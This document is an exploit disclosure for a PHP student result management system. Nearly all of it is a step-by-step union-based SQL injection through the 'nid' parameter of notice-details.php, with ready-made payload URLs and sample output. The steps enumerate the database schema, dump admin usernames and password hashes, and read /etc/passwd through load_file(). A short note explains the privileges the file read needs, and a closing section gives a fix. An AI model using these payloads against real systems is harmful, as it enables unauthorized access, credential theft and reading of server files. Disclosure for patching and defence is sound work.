# Exploit Title: Student Result Management System v2.0 Unauthenticated SQL Injection / Local File Inclusion
# Date: 2025-08-22
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/student-result-management-system/
# Demo Site: http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/
# Tested on: Arch Linux
# CVE: N/A

PoC:
Click any article on the notice board; the 'nid' parameter of notice-details.php is vulnerable to union-based SQL injection.

1- for version information
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,version(),3,4-- -

10.11.7-MariaDB-4

2- get databases on the server
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -

information_schema
srms

3- tables in the srms database
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema='srms'-- -

admin
tblnotice
tblstudents

4- get columns in table admin
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='admin'-- -

UserName
Password

5- dump data
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION ALL SELECT 1,concat(UserName,":",Password),3,4 FROM srms.admin-- -

admin:f925916e[REDACTED]533251

6- get local file (/etc/passwd)
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,load_file('/etc/passwd'),3,4 FROM srms.admin-- -

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
....

Note: step 6 is a file read through the database's load_file() function, reached via the same injection as steps 1-5, rather than a PHP file inclusion. It succeeds only when the application's database account holds the FILE privilege and secure_file_priv does not restrict the path; the file must also be readable by the database server process.

Fix: the 'nid' value appears to reach the SQL statement unescaped (the PHP source is not shown here). Bind it as a parameter in a prepared statement, or cast it to an integer, in notice-details.php, and run the application under a database account limited to the srms schema and without the FILE privilege.